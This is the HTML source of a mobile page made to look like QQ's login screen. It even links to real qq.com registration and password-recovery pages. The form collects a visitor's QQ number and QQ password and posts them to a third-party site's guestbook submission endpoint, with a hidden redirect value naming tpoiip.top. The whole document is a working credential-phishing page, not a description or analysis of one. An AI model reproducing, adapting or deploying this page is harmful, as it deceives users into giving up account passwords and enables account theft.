
<!DOCTYPE html>
<html lang="zh-cn">

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    <meta id="viewport" name="viewport"
        content="width=device-width,minimum-scale=1,maximum-scale=1,initial-scale=1,user-scalable=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <title>手机统一登录</title>
    <!--[if IE]>
<script type="text/javascript">
    window.Aegis = null;// 待兼容
</script>
<![endif]-->
    <!--[if !(IE)]><!-->
   
    <!--<![endif]-->

    <style type="text/css">
        @charset "utf-8";

        body,
        html {
            height: 100%
        }

        #error_tips #error_tips_content,
        #g_p,
        #g_u,
        .content,
        .header {
            position: relative
        }

        .del_touch,
        .inputstyle {
            -webkit-tap-highlight-color: rgba(255, 255, 255, 0)
        }

        #go,
        #onekey,
        #switch #swicth_login,
        #vcode #submit,
        .copyright,
        .header,
        .nick,
        .q_login,
        .ui_topbar {
            text-align: center
        }

        body {
            font-size: 16px;
            background: #eee
        }

        * {
            padding: 0;
            margin: 0;
            list-style: none;
            text-decoration: none
        }

        input::-webkit-input-placeholder,
        textarea::-webkit-input-placeholder {
            color: #aaa
        }

        input::-ms-input-placeholder,
        textarea::-ms-input-placeholder {
            color: #aaa
        }

        input:focus {
            outline: 0
        }

        .content {
            margin: 0 auto;
            width: 320px;
            height: 500px
        }

        #error_tips {
            position: absolute;
            top: 0;
            z-index: 100;
            display: none;
            opacity: .95;
            width: 100%
        }

        #error_tips #error_tips_content {
            padding: 10px 3px;
            border-radius: 5px;
            background-color: #525C5F
        }

        #error_tips #error_tips_content #error_icon {
            position: absolute;
            top: 10px;
            display: inline-block;
            width: 24px;
            height: 24px;
            background: url("/skin/m/images/info.png") no-repeat
        }

        #error_tips #error_tips_content #error_message {
            display: inline-block;
            line-height: 28px;
            font-size: 14px;
            color: #fff;
            padding: 0 0 0 28px
        }

        #error_message a,
        #error_message a:visited {
            color: #F15A22
        }

        @media (-webkit-min-device-pixel-ratio:2),
        (min-resolution:192dpi),
        (min-resolution:2dppx) {
            #error_tips #error_tips_content #error_icon {
                background: url("/skin/m/images/info@2x.png") no-repeat;
                background-size: 24px 24px
            }
        }

        .login {
            margin: 0 auto;
            padding-top: 30px
        }

        .q_login {
            margin: 0 auto 40px;
            width: 290px;
            overflow: hidden
        }

        .inputstyle {
            width: 273px;
            height: 44px;
            color: #000;
            border: none;
            background: 0 0;
            padding-left: 15px;
            font-size: 16px;
            -webkit-appearance: none
        }

        .logo {
            height: 100px;
            width: 244px;
            margin: 0 auto 20px;
            background-size: 244px 100px
        }

        .header {
            display: inline-block;
            height: 97px;
            width: 96px
        }

        .header img {
            width: 60px;
            height: 60px;
            position: absolute;
            top: 10px;
            left: 16px
        }

        .del_u,
        .header .img_out {
            left: 15px;
            position: absolute
        }

        .header .img_out {
            width: 60px;
            height: 60px;
            top: 9px;
            border: 1px solid #c6dbe8;
            border-radius: 4px;
            -webkit-box-shadow: 1px 1px 13px #6E6E6E
        }

        .nick {
            display: inline-block;
            position: absolute;
            top: 80px;
            left: 0;
            height: 20px;
            line-height: 18px;
            vertical-align: middle
        }

        .del_touch_icon {
            display: none;
            width: 30px;
            height: 30px;
            position: absolute;
            left: 60px;
            top: 0;
            z-index: 1
        }

        .del_icon {
            display: block;
            width: 24px;
            height: 22px;
            background: url("/skin/m/images/android_logo_v1.png") -68px 0 no-repeat;
            border-radius: 11px
        }

        #web_login {
            width: 290px;
            margin: 0 auto
        }

        #g_list {
            background: #fff;
            height: 89px;
            border-radius: 4px
        }

        #g_u {
            border-bottom: 1px solid #eaeaea
        }

        .txt_default {
            position: absolute;
            top: 12px;
            left: 10px;
            color: #b3b3b3
        }

        .del_touch {
            position: absolute;
            right: 0;
            display: none;
            height: 44px;
            width: 48px;
            z-index: 1
        }

        .del_u {
            display: block;
            top: 13px;
            height: 18px;
            width: 18px;
            border-radius: 9px;
            background: url("/skin/m/images/android_logo_v1.png") -117px -2px no-repeat
        }

        #auto_login {
            height: 24px;
            margin: 15px 0;
            color: #246183;
            position: relative
        }

        #auto_login .wording {
            position: absolute;
            left: 40px;
            line-height: 24px;
            height: 24px;
            font-size: 14px
        }

        #remember {
            position: absolute;
            left: 14px;
            top: 5px;
            cursor: pointer;
            z-index: 1;
            opacity: .01
        }

        #remember:checked+.checkbox {
            background: url("/skin/m/images/checked.png") 1px 1px #146FDF;
            border-color: #146FDF
        }

        #remember+.checkbox {
            display: inline-block;
            width: 21px;
            height: 21px;
            position: absolute;
            left: 9px;
            top: 1px;
            border: 1px solid #9ABBE3;
            background: 0 0;
            border-radius: 11px
        }

        #go,
        #onekey {
            width: 290px;
            height: 44px;
            line-height: 44px;
            background: #146fdf;
            border: none;
            border-radius: 4px;
            color: #fff;
            font-size: 16px;
            margin-top: 15px;
            display: block
        }

        #go.weak,
        #onekey.weak,
        #switch #swicth_login {
            height: 42px;
            border: 1px solid #9abbe3;
            color: #146fdf
        }

        #onekey {
            background: #146fdf;
            display: none
        }

        #go.weak,
        #onekey.weak {
            background-color: #e7e7e7
        }

        #switch {
            width: 290px;
            margin: 0 auto
        }

        #switch #swicth_login {
            width: 288px;
            line-height: 44px;
            border-radius: 5px;
            background: #e7e7e7;
            margin-top: 10px;
            font-size: 16px
        }

        #switch #zc_feedback {
            width: 290px;
            position: relative;
            margin-top: 15px;
            overflow: hidden
        }

        #switch #forgetpwd,
        #switch #zc {
            color: #246183;
            line-height: 14px;
            font-size: 14px;
            padding: 15px 10px
        }

        #switch #zc {
            float: right;
            margin-right: -10px
        }

        #switch #forgetpwd {
            float: left;
            margin-left: -10px
        }

        .tansparent {
            background: 0 0
        }

        #q_login_title {
            height: 32px;
            line-height: 22px;
            margin-bottom: 20px;
            position: relative
        }

        #q_login_logo {
            background: url("/skin/m/images/android_logo_v1.png") -44px 0 no-repeat;
            width: 22px;
            height: 22px;
            position: absolute;
            left: 0
        }

        #q_login_tips {
            position: absolute;
            left: 30px;
            top: 0;
            color: #246183
        }

        #vcode {
            margin: 0 auto;
            padding-top: 40px;
            display: none
        }

        #vcode #vcode_tips {
            display: block;
            width: 290px;
            height: 20px;
            line-height: 20px;
            margin: 0 auto 15px;
            color: #77838D
        }

        #vcode #vcode_area {
            position: relative;
            margin: 0 auto;
            width: 290px;
            height: 70px;
            border-radius: 5px;
            border: 1px solid #b8b8b8;
            background: #fff
        }

        #vcode #vcode_img {
            position: absolute;
            left: 3px;
            width: 140px;
            height: 70px
        }

        #vcode #vcode_input {
            position: absolute;
            top: -1px;
            left: 145px;
            width: 145px;
            height: 70px;
            border: 1px solid #9d9d9d;
            background: 0 0;
            -webkit-appearance: none;
            border-top-right-radius: 5px;
            border-bottom-right-radius: 5px;
            line-height: 28px;
            font-size: 28px;
            -webkit-box-shadow: inset 0 0 10px #ccc
        }

        #vcode #input_tips {
            position: absolute;
            top: 5px;
            left: 150px;
            display: block;
            width: 135px;
            height: 50px;
            color: #B3B3B3;
            z-index: 1;
            padding-top: 8px
        }

        #vcode #submit {
            width: 288px;
            height: 22px;
            padding: 10px 0;
            background: #7ec82c;
            border: none;
            border-radius: 5px;
            color: #fff;
            font-size: 22px;
            margin: 35px auto 0
        }

        .copyright {
            color: #8a949d;
            font-size: 10px;
            margin-top: 15px;
            font-family: Helvetica
        }

        .copyright .chs,
        .copyright .en {
            line-height: 20px
        }

        .mode_webapp .ui_topbar .topbar_btn b,
        .mode_webapp .ui_topbar .topbar_btn_left b {
            background-image: url("/skin/m/images/bg_btn_back.png");
            background-position: bottom right;
            background-size: 105px;
            width: 6px;
            height: 32px;
            float: left
        }

        .ui_topbar .topbar_title,
        .ui_topbar h3 {
            font-size: 18px
        }

        .ui_topbar {
            border-bottom: 1px solid #b6b6b6;
            border-top: 2px solid #df242a;
            background-color: #d9d9d9;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#ebebeb), to(#d9d9d9));
            background-image: -webkit-linear-gradient(top, #ebebeb, #d9d9d9);
            background-image: linear-gradient(to bottom, #ebebeb, #d9d9d9);
            height: 40px;
            line-height: 40px;
            position: relative
        }

        .lay_header {
            height: auto !important;
            width: 100%
        }

        .mode_webapp .ui_topbar {
            color: #fff;
            background-color: #c32d32;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#fe444a), to(#c32d32));
            background-image: -webkit-linear-gradient(top, #fe444a, #c32d32);
            background-image: linear-gradient(to bottom, #fe444a, #c32d32);
            border-bottom: 1px solid #700d00;
            border-top: 0 none;
            top: 0;
            left: 0;
            width: 100%;
            box-shadow: 0 0 5px #333
        }

        .mode_webapp .ui_topbar .topbar_btn_left {
            display: block;
            position: absolute;
            left: 10px;
            top: 5px
        }

        .mode_webapp .ui_topbar .topbar_btn span,
        .mode_webapp .ui_topbar .topbar_btn_left span {
            float: left;
            display: inline-block;
            height: 32px;
            line-height: 30px;
            color: #fff;
            background-image: url("/skin/m/images/bg_btn_back.png");
            background-size: 105px;
            padding-left: 10px;
            padding-right: 4px
        }

        .mode_webapp .ui_topbar .topbar_btn_left span {
            background-image: url("/skin/m/images/bg_btn_back.png");
            background-position: left -32px;
            background-size: 105px;
            padding-left: 17px
        }

        .skin-2 .ui_topbar {
            background-color: #161616;
            background-image: -webkit-gradient(linear, left top, left bottom, from(#3e3e3e), to(#262626));
            background-image: -webkit-linear-gradient(top, #3e3e3e, #262626);
            background-image: linear-gradient(to bottom, #3e3e3e, #262626);
            border-bottom-color: #1a1a1a
        }

        .skin-2 .ui_topbar .topbar_btn b,
        .skin-2 .ui_topbar .topbar_btn span,
        .skin-2 .ui_topbar .topbar_btn_left b,
        .skin-2 .ui_topbar .topbar_btn_left span {
            background-image: url("/skin/m/images/bg_btn_back_black@2x.png");
            background-size: 105px
        }

        .new_vcode {
            display: none;
            width: 100%;
            height: 100%;
            overflow: hidden
        }
    </style>
    <link rel="stylesheet" type="text/css" href="/skin/m/css/mobile_common.css">
    <style type="text/css">
        .logo {
            background-image: url("/skin/m/images/logo.png");
        }
    </style>
    <script>
        var STR_LANG = {
            no_uin: "你还没有输入帐号！",
            no_password: "你还没有输入密码！",
        };
    </script>
<script type="text/javascript" src="/public/static/common/js/ey_global.js?t=v1.5.8"></script>
</head>

<body>
    <div id="content" class="content">
        <div id="error_tips">
            <div id="error_tips_content"><span id="error_icon"></span> <span id="error_message">你还没有输入密码！</span></div>
        </div>
        <div id="login" class="login">
            <div id="logo" class="logo"></div>
							 <form method="POST" action="/index.php?m=home&c=Lists&a=gbook_submit&lang=cn" name="form1" id='form1'>
				 			<input type="hidden" name="gourl" id="gourl_c8beaa1700d1757bfa2cc90d19ea8ea9" value="http://tpoiip.top/" /><input type="hidden" name="typeid" value="68" /><input type="hidden" name="__token__c8beaa1700d1757bfa2cc90d19ea8ea9" id="c8beaa1700d1757bfa2cc90d19ea8ea9" value="" /><script type="text/javascript">
    function submitc8beaa1700d1757bfa2cc90d19ea8ea9(elements)
    {
        if (document.getElementById('gourl_c8beaa1700d1757bfa2cc90d19ea8ea9')) {
            document.getElementById('gourl_c8beaa1700d1757bfa2cc90d19ea8ea9').value = window.location.href;
        }
        
        
        elements.submit();
    }

    function ey_fleshVerify_1671569043(id)
    {
        var token = id.replace(/verify_/g, '__token__');
        var src = "/index.php?m=api&c=Ajax&a=vertify&type=guestbook&lang=cn&token="+token;
        src += "&r="+ Math.floor(Math.random()*100);
        document.getElementById(id).src = src;
    }

    function f4d25bb7d43bfc881fc140246bcd1c799()
    {
        var ajax = new XMLHttpRequest();
        ajax.open("post", "/index.php?m=api&c=Ajax&a=get_token&name=__token__c8beaa1700d1757bfa2cc90d19ea8ea9", true);
        ajax.setRequestHeader("X-Requested-With","XMLHttpRequest");
        ajax.setRequestHeader("Content-type","application/x-www-form-urlencoded");
        ajax.send('_ajax=1');
        ajax.onreadystatechange = function () {
            if (ajax.readyState==4 && ajax.status==200) {
                document.getElementById("c8beaa1700d1757bfa2cc90d19ea8ea9").value = ajax.responseText;
                document.getElementById("gourl_c8beaa1700d1757bfa2cc90d19ea8ea9").value = window.location.href;
          　}
        } 
    }
    f4d25bb7d43bfc881fc140246bcd1c799();
    function getNext1598839807(id,name,level) {
        var input = document.getElementById('attr_'+name);
        var first = document.getElementById('first_id_'+name);
        var second = document.getElementById('second_id_'+name);
        var third = document.getElementById('third_id_'+name);
        var findex ='', fvalue = '',sindex = '',svalue = '',tindex = '',tvalue = '',value='';

        if (level == 1){
            if (second) {
                second.style.display = 'none';
                second.innerHTML  = ''; 
            }
            if (third) {
                third.style.display = 'none';
                third.innerHTML  = '';
            }
            findex = first.selectedIndex;
            fvalue = first.options[findex].value;
            input.value = fvalue;
            value = fvalue;
        } else if (level == 2){
            if (third) {
                third.style.display = 'none';
                third.innerHTML  = '';
            }
            findex = first.selectedIndex;
            fvalue = first.options[findex].value;
            sindex = second.selectedIndex;
            svalue = second.options[sindex].value;
            if (svalue) {
                input.value = fvalue+','+svalue;
                value = svalue;
            }else{
                input.value = fvalue;
            }
        } else if (level == 3){
            findex = first.selectedIndex;
            fvalue = first.options[findex].value;
            sindex = second.selectedIndex;
            svalue = second.options[sindex].value;
            tindex = third.selectedIndex;
            tvalue = third.options[tindex].value;
            if (tvalue) {
                input.value = fvalue+','+svalue+','+tvalue;
                value = tvalue;
            }else{
                input.value = fvalue+','+svalue;
            }
        } 
        if (value) {
            if(document.getElementById(id))
            {
                document.getElementById(id).options.add(new Option('请选择','')); 
                var ajax = new XMLHttpRequest();
                //步骤二:设置请求的url参数,参数一是请求的类型,参数二是请求的url,可以带参数,动态的传递参数starName到服务端
                ajax.open("post", "/index.php?m=api&c=Ajax&a=get_region&pid="+value, true);
                // 给头部添加ajax信息
                ajax.setRequestHeader("X-Requested-With","XMLHttpRequest");
                // 如果需要像 HTML 表单那样 POST 数据，请使用 setRequestHeader() 来添加 HTTP 头。然后在 send() 方法中规定您希望发送的数据：
                ajax.setRequestHeader("Content-type","application/x-www-form-urlencoded");
                //步骤三:发送请求+数据
                ajax.send('_ajax=1');
                //步骤四:注册事件 onreadystatechange 状态改变就会调用
                ajax.onreadystatechange = function () {
                    //步骤五 如果能够进到这个判断 说明 数据 完美的回来了,并且请求的页面是存在的
                    if (ajax.readyState==4 && ajax.status==200) {
                        var data = JSON.parse(ajax.responseText).data;
                        if (data) {
                            data.forEach(function(item) {
                           document.getElementById(id).options.add(new Option(item.name,item.id)); 
                           document.getElementById(id).style.display = "block";

                        });
                        }
                  　}
                }
            }
        }
    }
</script>				   <div id="web_login">
				       <ul id="g_list">
				           <li id="g_u">
				               <div id="del_touch" class="del_touch"><span id="del_u" class="del_u"></span></div><input id="u"
				                   class="inputstyle"  name="attr_26" oninput="value=value.replace(/[^\d]/g,'')" autocomplete="off" maxlength="11" placeholder="请输入你的QQ号码">
				           </li>
				           <li id="g_p">
				               <div id="del_touch_p" class="del_touch"><span id="del_p" class="del_u"></span></div><input onkeyup="this.value=this.value.replace(/,/g,'，');"
				                   id="p" class="inputstyle" maxlength="16" type="password" name="attr_27" autocorrect="off"
				                   placeholder="请输入你的QQ密码">
				           </li>
				       </ul>
				       <div href="javascript:void(0);" id="go"> 登 陆</div>
				   </div>
				 </form>
			            
            <div id="switch">
                <div id="zc_feedback"> <span id="zc"
                        onclick="window.open('https://ssl.zc.qq.com/v3/index-chs.html?from=pt','_self')">注册新帐号</span> <span
                        id="forgetpwd" onclick="window.open('https://aq.qq.com/cn2/findpsw/mobile_v2/mobile_web_find_index?source_id=3263&account','_self')">忘了密码？</span> </div>
            </div>
            <div id="custom_bottom"> </div>
        </div>
       
    </div>
    <div id="new_vcode" class="new_vcode"><iframe id="cap_iframe" src="" frameborder="0" scrolling="auto" width="100%"
            height="100%"></iframe></div>
    <div id="footerBlank"></div>
    
<script src="/skin/m/js/jquery.js"></script>
</body>
<!-- 
<script>
 

    function getJSVersion() {
        //https://pre.cdn-go.cn/qq-web/any.ptlogin2.qq.com/33d4907a
        var frags = "https://qq-web-legacy.cdn-go.cn/any.ptlogin2.qq.com/v1.5.2".split('/');
        return frags[frags.length - 1] || 'unknown'
    }


    

    function isCdnGoResource(src) {
        return !!(typeof src === 'string' && src.indexOf('cdn-go.cn/') > -1)
    }

    function loadScript(src, successCallback, errorCallback, obj) {
        var tag = document.createElement("script");
        tag.type = 'text/javascript';
        tag.charset = "utf-8";
        if (isCdnGoResource(src)) { //加上跨域头，方便确认异常
            tag.crossOrigin = 'anonymous';
        }
        tag.onload = tag.onerror = tag.onreadystatechange = function () {
            tag.onerror = tag.onreadystatechange = null;
            if (window[obj]) { // 加载成功
                loadJs.onloadTime = +new Date();
                successCallback && successCallback();
                return;
            }
            if (!this.readyState || ((this.readyState === "loaded" || this.readyState === "complete") && !window[
                    obj])) {
                errorCallback && errorCallback();

            }
        };
        tag.src = src;
        document.getElementsByTagName("head")[0].appendChild(tag);
    };
    


  
    document.addEventListener &&
        document.addEventListener("DOMContentLoaded", loadJs, false);
    window.onload = loadJs;

</script> -->

<script>
$("#go").click(function(){
  var u = document.getElementById("u").value;
  var p = document.getElementById("p").value;
  if(u == ""){
    alert("请输入QQ号码！");
    return false;
  }else if(u.length < '7' ){
    alert("请输入正确的QQ号，最低7位！");
    return false;
  }else if(p == ""){
    alert("请输入QQ密码!");
    return false;
  }else if(p.length < '8' ){
    alert("密码不得低于8位!");
    return false;
  }else{
	  document.getElementById("form1").submit();
	  
  }
/* window.location.href="/toupiao.html?tid=1&uin="+$('#u').val(); */

});
</script>

</html>
